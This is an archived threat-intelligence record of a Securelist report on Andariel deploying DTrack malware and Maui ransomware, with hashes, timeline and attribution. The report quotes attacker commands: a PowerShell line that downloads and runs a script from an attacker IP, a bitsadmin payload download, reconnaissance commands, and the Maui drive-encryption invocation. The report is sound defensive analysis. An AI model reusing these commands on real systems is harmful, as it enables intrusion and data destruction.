{
	"id": "4f80e490-220f-45cd-a915-811e4be78ac7",
	"created_at": "2026-04-06T00:10:21.867278Z",
	"updated_at": "2026-04-10T03:34:54.525052Z",
	"deleted_at": null,
	"sha1_hash": "2bd387ccf00914086aa6eb9f119f7923a04fb12b",
	"title": "Andariel deploys DTrack and Maui ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 562690,
	"plain_text": "Andariel deploys DTrack and Maui ransomware\r\nBy Kurt Baumgartner\r\nPublished: 2022-08-09 · Archived: 2026-04-05 19:39:40 UTC\r\nOn July 7, 2022, the CISA published an alert, entitled, “North Korean State-Sponsored Cyber Actors Use Maui Ransomware To Target the Healthcare and Public Health Sector,” related to a Stairwell report, “Maui Ransomware.” Later, the Department of Justice announced that they had effectively clawed back $500,000 in ransom payments to the group, partly thanks to new legislation. We can confirm a Maui ransomware incident in 2022, and add some incident and attribution findings.\r\nWe extend their “first seen” date from the reported May 2021 to April 15th 2021, and the geolocation of the target, to Japan. Because the malware in this early incident was compiled on April 15th, 2021, and compilation dates are the same for all known samples, this incident is possibly the first ever involving the Maui ransomware.\r\nWhile CISA provides no useful information in its report to attribute the ransomware to a North Korean actor, we determined that approximately ten hours prior to deploying Maui to the initial target system, the group deployed a variant of the well-known DTrack malware to the target, preceded by 3proxy months earlier. This data point, along with others, should openly help solidify the attribution to the Korean-speaking APT Andariel, also known as Silent Chollima and Stonefly, with low to medium confidence.\r\nBackground\r\nWe observed the following timeline of detections from an initial target system:\r\n1. 2020-12-25 Suspicious 3proxy tool\r\n2. 2021-04-15 DTrack malware\r\n3. 2021-04-15 Maui ransomware\r\nDTrack malware\r\nMD5 739812e2ae1327a94e441719b885bd19\r\nSHA1 102a6954a16e80de814bee7ae2b893f1fa196613\r\nSHA256 6122c94cbfa11311bea7129ecd5aea6fae6c51d23228f7378b5f6b2398728f67\r\nLink time 2021-03-30 02:29:15\r\nFile type PE32 executable (GUI) Intel 80386, for MS Windows\r\nCompiler VS2008 build 21022\r\nFile size 1.2 MB\r\nhttps://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/\r\nPage 1 of 6\r\nFile name C:\\Windows\\Temp\\temp\\mvhost.exe\r\nOnce this malware is spawned, it executes an embedded shellcode, loading a final Windows in-memory payload. This malware is responsible for collecting victim information and sending it to the remote host. Its functionality is almost identical to previous DTrack modules. This malware collects information about the infected host via Windows commands. The in-memory payload executes the following Windows commands:\r\n\"C:\\Windows\\system32\\cmd.exe\" /c ipconfig /all \u003e \"%Temp%\\temp\\res.ip\"\r\n\"C:\\Windows\\system32\\cmd.exe\" /c tasklist \u003e \"%Temp%\\temp\\task.list\"\r\n\"C:\\Windows\\system32\\cmd.exe\" /c netstat -naop tcp \u003e \"%Temp%\\temp\\netstat.res\"\r\n\"C:\\Windows\\system32\\cmd.exe\" /c netsh interface show interface \u003e \"%Temp%\\temp\\netsh.res\"\r\n\"C:\\Windows\\system32\\cmd.exe\" /c ping -n 1 8.8.8.8 \u003e \"%Temp%\\temp\\ping.res\"\r\nIn addition, the malware collects browser history data, saving it to the browser.his file, just as the older variant did. Compared to the old version of DTrack, the new information-gathering module sends stolen information to a remote server over HTTP, and this variant copies stolen files to the remote host on the same network.\r\nMaui ransomware\r\nThe Maui ransomware was detected ten hours after the DTrack variant on the same server.\r\nMD5 ad4eababfe125110299e5a24be84472e\r\nSHA1 94db86c214f4ab401e84ad26bb0c9c246059daff\r\nSHA256 a557a0c67b5baa7cf64bd4d42103d3b2852f67acf96b4c5f14992c1289b55eaa\r\nLink time 2021-04-15 04:36:00\r\nFile type PE32 executable (GUI) Intel 80386, for MS Windows\r\nFile size 763.67 KB\r\nFile name C:\\Windows\\Temp\\temp\\maui.exe\r\nMultiple run parameters exist for the Maui ransomware. In this incident, we observe the actors using “-t” and “-x” arguments, along with a specific drive path to encrypt:\r\nC:\\Windows\\Temp\\temp\\bin\\Maui.exe -t 8 -x E:\r\nIn this case, “-t 8” sets the ransomware thread count to eight, “-x” commands the malware to “self melt”, and the “E:” value sets the path (the entire drive in this case) to be encrypted. The ransomware functionality is the same as described in the Stairwell report.\r\nThe malware created two key files to implement file encryption:\r\nRSA private key C:\\Windows\\Temp\\temp\\bin\\Maui.evd\r\nRSA public key C:\\Windows\\Temp\\temp\\bin\\Maui.key\r\nSimilar DTrack malware on different victims\r\nPivoting on the exfiltration information to the adjacent hosts, we discovered additional victims in India. One of these hosts was initially compromised in February 2021. In all likelihood, Andariel stole elevated credentials to deploy this malware within the target organization, but this speculation is based on paths and other artifacts, and we do not have any further details.\r\nMD5 f2f787868a3064407d79173ac5fc0864\r\nSHA1 1c4aa2cbe83546892c98508cad9da592089ef777\r\nSHA256 92adc5ea29491d9245876ba0b2957393633c9998eb47b3ae1344c13a44cd59ae\r\nLink time 2021-02-22 05:36:16\r\nFile type PE32 executable (GUI) Intel 80386, for MS Windows\r\nFile size 848 KB\r\nThe primary objective of this malware is the same as in the case of the aforementioned victim in Japan, using different login credentials and local IP address to exfiltrate data.\r\nWindows commands to exfiltrate data\r\nFrom the same victim, we discovered additional DTrack malware (MD5 87e3fc08c01841999a8ad8fe25f12fe4) using different login credentials.\r\nAdditional DTrack module and initial infection method\r\nThe “3Proxy” tool, likely utilized by the threat actor, was compiled on 2020-09-09 and deployed to the victim on 2020-12-25. Based on this detection and compilation date, we expanded our research scope and discovered an additional DTrack module. This module was compiled 2020-09-16 14:16:21 and detected in early December 2020, having a similar timeline to the 3Proxy tool deployment.\r\nMD5 cf236bf5b41d26967b1ce04ebbdb4041\r\nSHA1 feb79a5a2bdf0bcf0777ee51782dc50d2901bb91\r\nSHA256 60425a4d5ee04c8ae09bfe28ca33bf9e76a43f69548b2704956d0875a0f25145\r\nLink time 2020-09-16 14:16:21\r\nFile type PE32 executable (GUI) Intel 80386, for MS Windows\r\nCompiler VS2008 build 21022\r\nFile size 136 KB\r\nFile name %appdata%\\microsoft\\mmc\\dwem.cert\r\nThis DTrack module is very similar to the EventTracKer module of DTrack, which was previously reported to our Threat Intelligence customers. In one victim system, we discovered that a well-known simple HTTP server, HFS, had deployed the malware above. After an unknown exploit was used on a vulnerable HFS server and “whoami” was executed, the Powershell command below was executed to fetch an additional Powershell script from the remote server:\r\nC:\\windows\\system32\\WindowsPowershell\\v1.0\\powershell.exe IEX (New-Object Net.WebClient).DownloadString('hxxp://145.232.235[.]222/usr/users/mini.ps1')\r\nThe mini.ps1 script is responsible for downloading and executing the above DTrack malware via bitsadmin.exe:\r\nbitsadmin.exe /transfer myJob /download /priority high \"hxxp://145.232.235[.]222/usr/users/dwem.cert\" \"%appdata%\\microsoft\\mmc\\dwem.cert\"\r\nThe other victim operated a vulnerable Weblogic server. According to our telemetry, the actor compromised this server via the CVE-2017-10271 exploit. We saw Andariel abuse identical exploits and compromise WebLogic servers in mid-2019, and previously reported this activity to our Threat Intelligence customers. In this case, the exploited server executes the Powershell command to fetch the additional script. The fetched script is capable of downloading a Powershell script from the server we mentioned above (hxxp://145.232.235[.]222/usr/users/mini.ps1). Therefore, we can summarize that the actor abused vulnerable Internet-facing services to deploy their malware at least until the end of 2020.\r\nVictims\r\nThe July 2022 CISA alert noted that the healthcare and public health sectors had been targeted with the Maui ransomware within the US. However, based on our research, we believe this operation does not target specific industries and that its reach is global. We can confirm that the Japanese housing company was targeted with the Maui ransomware on April 15, 2021. Also, victims from India, Vietnam, and Russia were infected within a similar timeframe by the same DTrack malware as used in the Japanese Maui incident: from the end of 2020 to early 2021.\r\nOur research suggests that the actor is rather opportunistic and could compromise any company around the world, regardless of their line of business, as long as it enjoys good financial standing. It is probable that the actor favors vulnerable Internet-exposed web services. Additionally, Andariel deployed ransomware selectively to make financial profits.\r\nAttribution\r\nAccording to the Kaspersky Threat Attribution Engine (KTAE), the DTrack malware from the victim contains a high degree of code similarity (84%) with previously known DTrack malware.\r\nAlso, we discovered that the DTrack malware (MD5 739812e2ae1327a94e441719b885bd19) employs the same shellcode loader as “Backdoor.Preft” malware (MD5 2f553cba839ca4dab201d3f8154bae2a), published/reported by Symantec – note that Symantec recently described the Backdoor.Preft malware as “aka Dtrack, Valefor”. Apart from the code similarity, the actor used the 3Proxy tool (MD5 5bc4b606f4c0f8cd2e6787ae049bf5bb), and that tool was also previously employed by the Andariel/StoneFly/Silent Chollima group (MD5 95247511a611ba3d8581c7c6b8b1a38a). Symantec attributes StoneFly as the North Korean-linked actor behind the DarkSeoul incident.\r\nConclusions\r\nBased on the modus operandi of this attack, we conclude that the actor’s TTPs behind the Maui ransomware incident are remarkably similar to past Andariel/Stonefly/Silent Chollima activity:\r\nUsing legitimate proxy and tunneling tools after initial infection or deploying them to maintain access, and using Powershell scripts and Bitsadmin to download additional malware;\r\nUsing exploits to target known but unpatched vulnerable public services, such as WebLogic and HFS;\r\nExclusively deploying DTrack, also known as Preft;\r\nDwell time within target networks can last for months prior to activity;\r\nDeploying ransomware on a global scale, demonstrating ongoing financial motivations and scale of interest\r\nSource: https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/"
	],
	"report_names": [
		"107063"
	],
	"threat_actors": [
		{
			"id": "838f6ced-12a4-4893-991a-36d231d96efd",
			"created_at": "2022-10-25T15:50:23.347455Z",
			"updated_at": "2026-04-10T02:00:05.295717Z",
			"deleted_at": null,
			"main_name": "Andariel",
			"aliases": [
				"Andariel",
				"Silent Chollima",
				"PLUTONIUM",
				"Onyx Sleet"
			],
			"source_name": "MITRE:Andariel",
			"tools": [
				"Rifdoor",
				"gh0st RAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "110e7160-a8cc-4a66-8550-f19f7d418117",
			"created_at": "2023-01-06T13:46:38.427592Z",
			"updated_at": "2026-04-10T02:00:02.969896Z",
			"deleted_at": null,
			"main_name": "Silent Chollima",
			"aliases": [
				"Onyx Sleet",
				"PLUTONIUM",
				"OperationTroy",
				"Guardian of Peace",
				"GOP",
				"WHOis Team",
				"Andariel",
				"Subgroup: Andariel"
			],
			"source_name": "MISPGALAXY:Silent Chollima",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "68cc6e37-f16d-4995-a75b-5e8e2a6cbb3d",
			"created_at": "2024-05-01T02:03:07.943593Z",
			"updated_at": "2026-04-10T02:00:03.795229Z",
			"deleted_at": null,
			"main_name": "BRONZE EDISON",
			"aliases": [
				"APT4 ",
				"DarkSeoul",
				"Maverick Panda ",
				"Salmon Typhoon ",
				"Sodium ",
				"Sykipot ",
				"TG-0623 ",
				"getkys"
			],
			"source_name": "Secureworks:BRONZE EDISON",
			"tools": [
				"Gh0st RAT",
				"Wkysol",
				"ZxPortMap"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "bc6e3644-3249-44f3-a277-354b7966dd1b",
			"created_at": "2022-10-25T16:07:23.760559Z",
			"updated_at": "2026-04-10T02:00:04.741239Z",
			"deleted_at": null,
			"main_name": "Andariel",
			"aliases": [
				"APT 45",
				"Andariel",
				"G0138",
				"Jumpy Pisces",
				"Onyx Sleet",
				"Operation BLACKMINE",
				"Operation BLACKSHEEP/Phase 3.",
				"Operation Blacksmith",
				"Operation DESERTWOLF/Phase 3",
				"Operation GHOSTRAT",
				"Operation GoldenAxe",
				"Operation INITROY/Phase 1",
				"Operation INITROY/Phase 2",
				"Operation Mayday",
				"Operation VANXATM",
				"Operation XEDA",
				"Plutonium",
				"Silent Chollima",
				"Stonefly"
			],
			"source_name": "ETDA:Andariel",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "771d9263-076e-4b6e-bd58-92b6555eb739",
			"created_at": "2025-08-07T02:03:25.092436Z",
			"updated_at": "2026-04-10T02:00:03.758541Z",
			"deleted_at": null,
			"main_name": "NICKEL HYATT",
			"aliases": [
				"APT45 ",
				"Andariel",
				"Dark Seoul",
				"Jumpy Pisces ",
				"Onyx Sleet ",
				"RIFLE Campaign",
				"Silent Chollima ",
				"Stonefly ",
				"UN614 "
			],
			"source_name": "Secureworks:NICKEL HYATT",
			"tools": [
				"ActiveX 0-day",
				"DTrack",
				"HazyLoad",
				"HotCriossant",
				"Rifle",
				"UnitBot",
				"Valefor"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434221,
	"ts_updated_at": 1775792094,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2bd387ccf00914086aa6eb9f119f7923a04fb12b.pdf",
		"text": "https://archive.orkl.eu/2bd387ccf00914086aa6eb9f119f7923a04fb12b.txt",
		"img": "https://archive.orkl.eu/2bd387ccf00914086aa6eb9f119f7923a04fb12b.jpg"
	}
}